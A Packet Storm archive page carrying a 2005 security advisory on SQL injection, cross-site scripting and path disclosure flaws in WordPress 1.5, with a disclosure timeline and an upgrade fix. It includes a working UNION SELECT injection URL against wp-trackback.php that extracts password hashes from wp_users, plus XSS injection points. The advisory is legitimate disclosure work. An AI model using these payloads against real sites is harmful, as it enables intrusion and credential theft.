what you don't know can hurt you

wordpress15sql.txt

wordpress15sql.txt
Posted Aug 14, 2005
Authored by Thomas Waldegger

Wordpress versions 1.5 and below suffer from SQL injection and cross site scripting flaws.

tags | exploit, xss, sql injection
MD5 | 861e1a416b2ffd14be3526bbc402f370

wordpress15sql.txt

Change Mirror Download


---------------------------------------------------
| BuHa Security-Advisory #1 | May 17th, 2005 |
---------------------------------------------------
| Vendor | Wordpress |
| URL | http://wordpress.org/ |
| Version | <= Wordpress 1.5 |
| Risk | Moderate (SQL-Injection) |
---------------------------------------------------

o Description:
=============

WordPress is a state-of-the-art semantic personal publishing platform
with a focus on aesthetics, web standards, and usability.

Visit http://wordpress.org/ for detailed information.

o SQL-Injection:
===============

The most critical vulnerability in the 1.5 release of wordpress is an
SQL-Injection in `wp-trackback.php'. It's not easily exploitable
because you do not get a result when you inject a valid query but it's
possible to bruteforce values in the tables - for example the password
hashes.

Here some details:
The parameter `tb_id' in `wp-trackback.php' is not validated correctly
and there are no quotes in the SQL-query so an attacker is able to
insert sql commands.

$pingstatus = $wpdb->get_var("SELECT ping_status FROM $wpdb->posts
WHERE ID = $tb_id");

Example: (I converted the POST-request into a GET-request.)

> $tb_id = 1 union select user_pass,0 from wp_users
> $url = bla
> $title = bla

</wp-trackback.php?tb_id=1%20union%20select%200,user_pass%20from%20
wp_users&url=bla&title=bla>

By injecting this query I get following databae error:

> WordPress database error:
> [The used SELECT statements have a different number of columns]
> SELECT ping_status FROM wp_posts WHERE ID = 1 union select 0,
> user_pass from wp_users

When I insert "1 union select user_pass from wp_users" as value for
`tb_id' I get no error message because the query was well-formed -
logical. Through the possibility to insert any sql-command it's
possible to 'reconstruct' values of the tables.

o XSS:
=====

</wp-admin/edit.php?s=[XSS]&submit=Search>
</wp-admin/post.php?action=confirmdeletecomment&comment=1&p=[XSS]>

o Path Disclosure:
=================

</wordpress-1.5-strayhorn/wp-content/themes/*>
</wordpress-1.5-strayhorn/wp-includes/*>
</wordpress-1.5-strayhorn/wp-admin/*>

> Fatal error: Call to undefined function add_filter() in
> [...]/htdocs/testenv/blogs/wordpress/wordpress-1.5-strayhorn/
> wp-content/themes/classic/comments-popup.php on line 3

o Disclosure Timeline:
=====================

17 Apr 05 - Security flaws discovered.
19 Apr 05 - Vendor contacted.
10 May 05 - Vendor released bugfixed version.
17 May 05 - Public release.

o Solution:
==========

Upgrade to wordpress 1.5.1 [1]

o Credits:
=========

Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/

[1] http://wordpress.org/development/2005/05/one-five-one/

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close